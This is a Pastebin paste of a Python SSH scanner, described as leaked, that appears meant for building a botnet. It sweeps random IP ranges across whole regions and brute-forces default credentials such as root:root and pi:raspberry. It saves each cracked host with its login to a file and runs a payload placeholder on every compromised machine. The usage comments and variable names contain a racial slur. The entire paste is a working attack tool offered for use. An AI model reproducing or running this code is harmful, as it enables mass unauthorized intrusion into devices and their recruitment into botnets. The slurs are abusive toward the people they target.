Advertisement
DaddyDanCodes

Purge.py Leaked python scanner

Aug 16th, 2017
467
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.00 KB | None | 0 0
  1. #!/usr/bin/env python
  2. # python purge.py 500 NIGGER 1 1
  3. # python purge.py 500 TELNET 1 4
  4. # python purge.py 500 BABY 1 6
  5. # python purge.py 500 SATAN 1 3
  6. # python purge.py 999 B 119.93 1
  7. # RANGES 113.53, 119.93, 122.3, 122.52, 101.108, 180.180, 125.27, 101.109,
  8. #passwords 1, 2,3,4,5,6,7
  9. import threading, paramiko, random, socket, time, sys
  10.  
  11. paramiko.util.log_to_file("/dev/null")
  12.  
  13. blacklist = [
  14. '127'
  15. ]
  16.  
  17. passwords = [
  18. "admin:admin"
  19. "root:root"
  20. "root:admin"
  21. "telnet:telnet"
  22. "guest:guest"
  23. "admin:admin"
  24. "admin:1234"
  25. "pi:raspberry"
  26. "vagrant:vagrant"
  27. "ubnt:ubnt"
  28. ]
  29.  
  30.  
  31. if sys.argv[4] == '1':
  32. passwords = ["root:root"]
  33. if sys.argv[4] == '2':
  34. passwords = ["guest:guest"]
  35. if sys.argv[4] == '3':
  36. passwords = ["admin:1234"]
  37. if sys.argv[4] == '4':
  38. passwords = ["telnet:telnet"]
  39. if sys.argv[4] == '5':
  40. passwords = ["root:root", "admin:1234"]
  41. if sys.argv[4] == '6':
  42. passwords = ["root:root", "root:admin"]
  43. if sys.argv[4] == '7':
  44. passwords = ["root:root", "admin:admin", "root:admin", "admin:1234"]
  45. if sys.argv[4] == '8':
  46. passwords = ["root:root", "admin:1234", "root:admin", "user:user", "test:test"]
  47. if sys.argv[4] == 'perl':
  48. passwords = ["pi:raspberry", "vagrant:vagrant", "ubnt:ubnt"]
  49.  
  50. print "\x1b[1;32m************************************\x1b[1;35m"
  51. print "\x1b[1;32m* Purge Started *\x1b[1;35m"
  52. print "\x1b[1;32m* Sending Nudes <3 *\x1b[1;35m"
  53. print "\x1b[1;32m************************************\x1b[1;35m"
  54.  
  55. ipclassinfo = sys.argv[2]
  56. if ipclassinfo == "A":
  57. ip1 = sys.argv[3]
  58. elif ipclassinfo == "B":
  59. ip1 = sys.argv[3].split(".")[0]
  60. ip2 = sys.argv[3].split(".")[1]
  61. elif ipclassinfo == "C":
  62. ips = sys.argv[3].split(".")
  63. num=0
  64. for ip in ips:
  65. num=num+1
  66. if num == 1:
  67. ip1 = ip
  68. elif num == 2:
  69. ip2 = ip
  70. elif num == 3:
  71. ip3 = ip
  72. class sshscanner(threading.Thread):
  73. global passwords
  74. global ipclassinfo
  75. if ipclassinfo == "A":
  76. global ip1
  77. elif ipclassinfo == "B":
  78. global ip1
  79. global ip2
  80. elif ipclassinfo == "C":
  81. global ip1
  82. global ip2
  83. global ip3
  84. def run(self):
  85. while 1:
  86. try:
  87. while 1:
  88. thisipisbad='no'
  89. if ipclassinfo == "A":
  90. self.host = ip1+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  91. elif ipclassinfo == "B":
  92. self.host = ip1+'.'+ip2+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  93. elif ipclassinfo == "C":
  94. self.host = ip1+'.'+ip2+'.'+ip3+'.'+str(random.randrange(0,256))
  95. elif ipclassinfo == "BABY": # password 6
  96. br = ["179.105","179.152","189.29","189.32","189.33","189.34","189.35","189.39","189.4","189.54","189.55","189.60","189.61","189.62","189.63","189.126"]
  97. self.host = random.choice(br)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  98. elif ipclassinfo == "LRAB": #password 7
  99. yeet = ["122","119","161","37","186","187","31","188","201","2","168"]
  100. self.host = random.choice(yeet)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  101. elif ipclassinfo == "NIGGER": # password 1
  102. lucky = ["125.27","101.109","113.53","118.173","46.62","5.78","125.25","125.26","182.52","125.24","180.180"]
  103. self.host = random.choice(lucky)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  104. elif ipclassinfo == "SATAN": #password 3
  105. lucky2 = [ "122.3","122.52","122.54","119.93","124.105","125.104","49.144","49.145" ]
  106. self.host = random.choice(lucky2)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  107. elif ipclassinfo == "TELNET": # password 4
  108. lucky2 = [ "103.20","103.30","103.47","103.57","12.188","12.34","13.92","14.150","14.162" ]
  109. self.host = random.choice(lucky2)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  110. elif ipclassinfo == "RAND":
  111. self.host = str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  112. elif ipclassinfo == "INTERNET":
  113. lol = ["1"]
  114. self.host = random.choice(lol)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  115. else:
  116. self.host = str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  117. for badip in blacklist:
  118. if badip in self.host:
  119. thisipisbad='yes'
  120. if thisipisbad=='no':
  121. break
  122. username='root'
  123. password=""
  124. port = 22
  125. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  126. s.settimeout(3)
  127. s.connect((self.host, port))
  128. s.close()
  129. ssh = paramiko.SSHClient()
  130. ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
  131. dobreak=False
  132. for passwd in passwords:
  133. if ":n/a" in passwd:
  134. password=""
  135. else:
  136. password=passwd.split(":")[1]
  137. if "n/a:" in passwd:
  138. username=""
  139. else:
  140. username=passwd.split(":")[0]
  141. try:
  142. ssh.connect(self.host, port = port, username=username, password=password, timeout=3)
  143. dobreak=True
  144. break
  145. except:
  146. pass
  147. if True == dobreak:
  148. break
  149. badserver=True
  150. stdin, stdout, stderr = ssh.exec_command("/sbin/ifconfig")
  151. output = stdout.read()
  152. if "inet addr" in output:
  153. badserver=False
  154. if badserver == False:
  155. print '\x1b[1;32mFound \x1b[1;31m '+self.host+'~\x1b[1;35m'+username+'~\x1b[1;36m'+password+'~\x1b[1;33m'+str(port)
  156. ssh.exec_command("PLACED PAYLOAD HERE IDIOTS")
  157. nigger = open("DaddyDan.txt", "a").write(username + ":" + password + ":" + self.host + "\n")
  158. time.sleep(15)
  159. ssh.close()
  160. except:
  161. pass
  162.  
  163. for x in range(0,1500):
  164. try:
  165. t = sshscanner()
  166. t.start()
  167. except:
  168. pass
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement